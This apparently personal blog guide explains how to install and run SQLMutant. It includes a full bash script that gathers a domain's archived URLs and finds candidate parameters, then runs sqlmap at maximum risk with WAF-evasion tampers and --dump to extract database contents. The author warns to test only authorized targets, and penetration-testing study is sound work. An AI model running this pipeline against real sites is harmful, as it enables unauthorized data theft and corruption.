
Installation of SQLMutant tool

This tool works perfectly on an Ubuntu 24 system. I found it does not work properly on the Kali Linux 24 version.

https://github.com/blackhatethicalhacking/SQLMutant/tree/main

This tool is meant to be used together with sqlmap. This cheat sheet is for Kali or other Debian-based systems. The tool collects historical URLs for the target domain, filters them for query parameters that look SQL-relevant, discovers extra parameters, and hands you the URLs where SQL injection may be possible. You then use sqlmap to exploit them.

Prerequisites:

apt install pipx -y (for Ubuntu)

pipx install uro (pip3 install uro also works, but Ubuntu 24 and Kali 2024 mark the system Python as externally managed and refuse plain pip installs, so pipx is the safer choice)

pipx ensurepath

pipx completions (not needed)

source ~/.bashrc, or log out and back in, so the PATH change made by pipx ensurepath takes effect

If Go is not installed, install it with one of the two commands below, or follow this link to install Go (https://mahimfiroj.blogspot.com/2024/12/installing-nuclei-in-kali.html). Otherwise skip this step.

dpkg -l | grep packagename (use this to check whether a package is installed; replace packagename with the package you are looking for, e.g. golang-go)

apt install gccgo-go -y

or

apt install golang-go -y (This one worked for me in Ubuntu.)

golang-go is the better choice of the two: gccgo-go is the gcc-based toolchain and tracks an older Go release, while the Go tools installed below expect a current one.

go install github.com/tomnomnom/waybackurls@latest

apt install arjun -y

apt install python3-ratelimit (Arjun gives an error on Kali if this package is not installed; on Ubuntu it is not required.)

go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

Note for Kali: the Kali repository packages projectdiscovery's httpx as httpx-toolkit, because the name httpx collides with the Python httpx client. The script calls the tool as plain httpx, so after installing run which -a httpx and httpx -version to confirm that the name resolves to the Go tool and not to a Python httpx that happens to be on PATH.

apt install jq -y

apt install toilet -y (the corrected script below prints its banner with figlet, so install the figlet package as well)


Make sure sqlmap is installed. It comes preinstalled on Kali; on Ubuntu it does not, so use the commands below:

apt install sqlmap or snap install sqlmap

sqlmap --update (answer y to the interactive question)

apt install python-is-python3 -y (required for sqlmap on Ubuntu, which has no python command by default, only python3)

Then install lolcat:

apt install ruby -y

gem install lolcat

lolcat --version


Now add Go's bin directory to PATH, otherwise the waybackurls and httpx commands installed by go install will not be found.

Run this on the command shell:

export PATH=$PATH:$(go env GOPATH)/bin

To make it permanent, add the same line to ~/.profile and then source it.

export PATH=$PATH:$(go env GOPATH)/bin

source ~/.profile
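Before running the script it is worth checking that every tool it calls is actually on PATH, that Go's bin directory is on PATH, and that httpx resolves to projectdiscovery's tool rather than the Python httpx client. The check below is an added example written for this page, not part of SQLMutant; the tool list is taken from the corrected script further down, and the httpx check assumes projectdiscovery's httpx prints its banner for -version.

```bash
#!/bin/bash
# Added example, not part of SQLMutant: check the toolchain the corrected SQLMutant.sh on this
# page calls, before running it. Tool list is taken from that script; the httpx check assumes
# projectdiscovery's httpx, which prints its banner for -version.

SQLMUTANT_TOOLS="curl wget lolcat figlet waybackurls uro httpx jq arjun sqlmap"

# missing_tools NAME... -> prints the names that are not on PATH, one per line.
missing_tools() {
    for tool in "$@"; do
        command -v "$tool" >/dev/null 2>&1 || printf '%s\n' "$tool"
    done
}

# path_contains PATHLIST DIR -> 0 if DIR is one of the colon-separated entries of PATHLIST.
path_contains() {
    case ":$1:" in
        *":$2:"*) return 0 ;;
        *)        return 1 ;;
    esac
}

# go_bin_on_path -> 0 if $(go env GOPATH)/bin is on PATH. That is where go install puts
# waybackurls and httpx; if it is missing, the export PATH line above has not taken effect.
go_bin_on_path() {
    gobin="$(go env GOPATH 2>/dev/null)/bin" || return 1
    path_contains "$PATH" "$gobin"
}

# httpx_is_projectdiscovery -> 0 if the httpx on PATH is projectdiscovery's Go tool.
# On Kali the Go tool is packaged as httpx-toolkit because plain "httpx" collides with the
# Python httpx client, so a stray Python httpx can shadow the one the script needs.
httpx_is_projectdiscovery() {
    httpx -version 2>&1 | grep -qiE 'projectdiscovery|current version'
}

main() {
    missing="$(missing_tools $SQLMUTANT_TOOLS)"
    if [ -n "$missing" ]; then
        echo "Missing tools (install them as described above):"
        echo "$missing"
    fi
    if command -v go >/dev/null 2>&1; then
        go_bin_on_path || echo "GOPATH/bin is not on PATH: run export PATH=\$PATH:\$(go env GOPATH)/bin"
    fi
    if command -v httpx >/dev/null 2>&1; then
        httpx_is_projectdiscovery || echo "httpx on PATH is not projectdiscovery's httpx; check with: which -a httpx"
    fi
    if [ -z "$missing" ]; then
        echo "All tools present."
    fi
}

main "$@"
```

Run it once after finishing the prerequisites; an empty "Missing tools" report plus no PATH warning means SQLMutant.sh will find everything it needs.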

Once all the prerequisites are in place, install SQLMutant itself:

apt install git -y (on Ubuntu; Kali already includes git)

git clone https://github.com/blackhatethicalhacking/SQLMutant.git

cd SQLMutant

chmod +x SQLMutant.sh

./SQLMutant.sh

The script asks for a domain name (e.g. example.com, without a scheme). Enter it and wait. It writes its results into a directory named after the domain; the merged URL list it hands to sqlmap is sql_ready_urls2.txt in that directory, and sqlmap's own findings land under ~/.local/share/sqlmap/output/. The full sqlmap command the tool runs is visible at the end of the script, so you can rerun it by hand against individual URLs; for the exploitation steps, follow my medium sqlmap link. Because that command uses --risk=3 (which adds OR-based payloads that can modify data if they land in an UPDATE or DELETE statement) and --dump (which extracts table contents), run the tool only against systems you are authorized to test.

Corrected script for Kali:

#!/bin/bash
# SQLMutant.sh, corrected for Kali. Fixes over the repository version: all_urls.txt is now
# actually written (the original passed the file name to httpx as a positional argument and
# never created it), Arjun's JSON is read in the shape Arjun really emits, the counts report
# the right files, and the --string option that broke sqlmap's boolean-based detection is gone.

# Fail early if a dependency is missing instead of half-way through the run.
# On Kali make sure "httpx" is projectdiscovery's tool (packaged as httpx-toolkit), not the Python client.
for tool in curl wget lolcat figlet waybackurls uro httpx jq arjun sqlmap; do
    command -v "$tool" >/dev/null 2>&1 || { echo "Missing tool: $tool" >&2; exit 1; }
done

curl --silent "https://raw.githubusercontent.com/blackhatethicalhacking/Subdomain_Bruteforce_bheh/main/ascii.sh" | lolcat
echo ""

# Generate a random Sun Tzu quote for offensive security
quotes=("The supreme art of war is to subdue the enemy without fighting." "All warfare is based on deception." "He who knows when he can fight and when he cannot, will be victorious." "The whole secret lies in confusing the enemy, so that he cannot fathom our real intent." "To win one hundred victories in one hundred battles is not the acme of skill. To subdue the enemy without fighting is the acme of skill.")
random_quote=${quotes[$RANDOM % ${#quotes[@]}]}

# Print the quote
echo "Offensive Security Tip: $random_quote - Sun Tzu" | lolcat
sleep 1
echo "MEANS, IT'S ☕ 1337 ⚡ TIME, 369 ☯ " | lolcat
sleep 1
figlet -w 80 -f small SQLMutant | lolcat
echo ""
echo "[YOU ARE USING SQLMutant.sh] - (v1.0) CODED BY Chris 'SaintDruG' Abou-Chabké WITH ❤ FOR blackhatethicalhacking.com for Educational Purposes only!" | lolcat
sleep 1

# Check if connected to the internet
tput bold; echo "CHECKING IF YOU ARE CONNECTED TO THE INTERNET!" | lolcat
if ! wget -q --spider https://google.com; then
    echo "++++ CONNECT TO THE INTERNET BEFORE RUNNING SQLMutant.sh!" | lolcat
    exit 1
fi
tput bold; echo "++++ CONNECTION FOUND, LET'S GO!" | lolcat

# Get domain from user input (bare domain, no scheme)
echo "Please enter the domain to scan (e.g. example.com):" | lolcat
read -r domain
if [ -z "$domain" ]; then
    echo "No domain given, exiting." | lolcat
    exit 1
fi

# Create a directory for the output files
echo "Creating directory for output files..." | lolcat
mkdir -p "$domain"
sleep 1

# Get URLs from Wayback Machine, collapse value-only duplicates with uro, keep live URLs with httpx.
# tee saves the full live list; the grep keeps URLs whose parameter separators (?, =, &) are
# followed by an SQL-flavoured token (id, select, union, ...).
echo "Fetching URLs from Wayback Machine and advanced Regex Filtering using HTTPX..." | lolcat
waybackurls "$domain" | uro | httpx -silent | tee "$domain/all_urls.txt" \
    | grep -iE '(\?|=|&)(id|select|update|union|from|where|insert|delete|into|information_schema)' \
    | sort -u > "$domain/sql_ready_urls.txt"
grep -F '?' "$domain/all_urls.txt" > "$domain/all_urls_withparams.txt"

# Inform user about the number of URLs found
num_urls=$(wc -l < "$domain/all_urls.txt")
echo "Found $num_urls live URLs for $domain before applying the Magic Regex Patterns." | lolcat
sleep 5

# Inform user about the number of URLs ready for SQL injection testing
# (count the regex-filtered file, not the all-parameters file)
num_sql_urls=$(wc -l < "$domain/sql_ready_urls.txt")
echo "Found $num_sql_urls URLs ready for SQL injection after applying the Magic Regex Patterns for $domain." | lolcat
sleep 5

# Run Arjun with 20 threads to find more parameters
echo "Finding more parameters using Arjun with 20 threads..." | lolcat
arjun -i "$domain/all_urls.txt" -t 20 --disable-redirects -oJ "$domain/arjun_output.json"

# Arjun's JSON is keyed by URL: {"<url>": {"params": [...], "method": ..., "headers": ...}}.
# Turn every discovered parameter into a testable URL (value 1) so sqlmap has something to inject into.
if [ -f "$domain/arjun_output.json" ]; then
    jq -r 'to_entries[] | select(.value.params | length > 0)
           | .key as $u | .value.params[]
           | $u + (if ($u | contains("?")) then "&" else "?" end) + . + "=1"' \
        "$domain/arjun_output.json" > "$domain/arjun_urls.txt"
else
    : > "$domain/arjun_urls.txt"
fi

# Merge URLs from Arjun and Wayback results. all_urls.txt is deliberately not merged back in:
# URLs without parameters give sqlmap nothing to inject into and would undo the filtering above.
echo "Merging Arjun and Wayback URLs..." | lolcat
cat "$domain/sql_ready_urls.txt" "$domain/all_urls_withparams.txt" "$domain/arjun_urls.txt" \
    | uro | sort -u > "$domain/sql_ready_urls2.txt"

# Inform user about the new number of URLs ready for SQL injection testing
num_sql_urls2=$(wc -l < "$domain/sql_ready_urls2.txt")
echo "Found $num_sql_urls2 URLs ready for SQL injection testing for $domain after using Arjun and merging results." | lolcat
sleep 5

# Test SQL injection on the list of URLs using SQLMAP.
# --string was removed: it tells sqlmap which text marks a TRUE response, and a fixed made-up
# string never appears in any page, so boolean-based detection could never succeed with it.
# --risk=3 adds OR-based payloads that can modify data if they land in an UPDATE/DELETE, and
# --dump pulls table contents: use only against targets you are authorized to test.
# Drop --dbms=mysql if the backend is not known to be MySQL.
echo "Testing SQL injection on the new list of URLs using SQLMAP with a Tweaked Aggressive Approach..." | lolcat
sqlmap -m "$domain/sql_ready_urls2.txt" --risk=3 --smart --hpp --level=5 --random-agent --threads=10 \
    --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes \
    --skip-urlencode --forms --dump --dbms=mysql --batch

echo "Make sure to examine the results manually in the location: $HOME/.local/share/sqlmap/output/" | lolcat
sleep 3

echo -e "\nThank you for using SQLMutant by SaintDruG!" | lolcat
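The URL triage the script performs (uro dedupe, the "Magic Regex", the with-parameters split) can be understood without touching a target. The following is an added example for this page, not code from SQLMutant or its author: it runs the script's regex and a value-insensitive dedupe over a constructed URL list so the effect of each stage is visible. The sample URLs are made up, httpx is left out because it needs a live target, and dedupe_by_params is an awk approximation of what uro does (uro itself is not called), so the counts apply to this sample only. It also shows a limit of the regex worth knowing: having no word boundary, it matches ?identity= but misses ?uid=, so parameter names such as uid, pid or item_id only reach sqlmap through the all_urls_withparams.txt merge.

```bash
#!/bin/bash
# Added example, not SQLMutant's code: the URL triage stages of SQLMutant.sh run offline
# on a constructed list, so the regex and the value-insensitive dedupe can be inspected.

# Constructed sample standing in for waybackurls output (not real data).
SAMPLE_URLS='http://example.com/
http://example.com/products.php?id=1
http://example.com/products.php?id=2
http://example.com/products.php?id=3&sort=asc
http://example.com/search?q=shoes
http://example.com/news/view?select=all
http://example.com/static/app.js
https://example.com/products.php?id=9
http://example.com/login.php
http://example.com/user?uid=5&page=2
http://example.com/user?page=3&uid=7
http://example.com/profile?identity=7'

# The regex from SQLMutant.sh: a parameter separator (?, = or &) followed by an SQL-flavoured
# token. It has no word boundary, so "?identity=" matches while "?uid=" does not.
SQLI_REGEX='(\?|=|&)(id|select|update|union|from|where|insert|delete|into|information_schema)'

# dedupe_by_params: stdin URLs -> first URL seen for each (scheme+host+path, sorted set of
# parameter names). Approximates what uro does in the pipeline; parameter values are ignored.
dedupe_by_params() {
    awk -F'[?]' '
    {
        base = $1; names = ""
        if (NF > 1) {
            n = split($2, kv, "&")
            for (i = 1; i <= n; i++) { split(kv[i], p, "="); pn[i] = p[1] }
            # insertion sort so a=1&b=2 and b=2&a=1 collapse onto the same key
            for (i = 2; i <= n; i++) {
                v = pn[i]; j = i - 1
                while (j > 0 && pn[j] > v) { pn[j + 1] = pn[j]; j-- }
                pn[j + 1] = v
            }
            for (i = 1; i <= n; i++) names = names "&" pn[i]
        }
        key = base names
        if (!(key in seen)) { seen[key] = 1; print }
    }'
}

# with_params: stdin URLs -> those carrying a query string (the all_urls_withparams.txt stage).
with_params() { grep -F '?'; }

# sqli_candidates: stdin URLs -> regex matches, deduped (the sql_ready_urls.txt stage).
sqli_candidates() { grep -iE "$SQLI_REGEX" | sort -u; }

# count_lines: stdin -> line count without padding.
count_lines() { wc -l | tr -d ' '; }

# Counts for each stage over the sample, so the effect of every filter is visible.
deduped_count()   { printf '%s\n' "$SAMPLE_URLS" | dedupe_by_params | count_lines; }
params_count()    { printf '%s\n' "$SAMPLE_URLS" | dedupe_by_params | with_params | count_lines; }
candidate_count() { printf '%s\n' "$SAMPLE_URLS" | dedupe_by_params | sqli_candidates | count_lines; }

echo "after uro-style dedupe: $(deduped_count) URLs (12 in)"
echo "with parameters:        $(params_count) URLs"
echo "regex candidates:       $(candidate_count) URLs"
echo "candidates:"
printf '%s\n' "$SAMPLE_URLS" | dedupe_by_params | sqli_candidates
```

On this sample the dedupe drops the two URLs that differ only in parameter values or order, seven of the remaining ten carry parameters, and five survive the regex; the user?uid= URLs are not among the five, which is exactly why the script merges all_urls_withparams.txt back in before handing the list to sqlmap.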


Avi
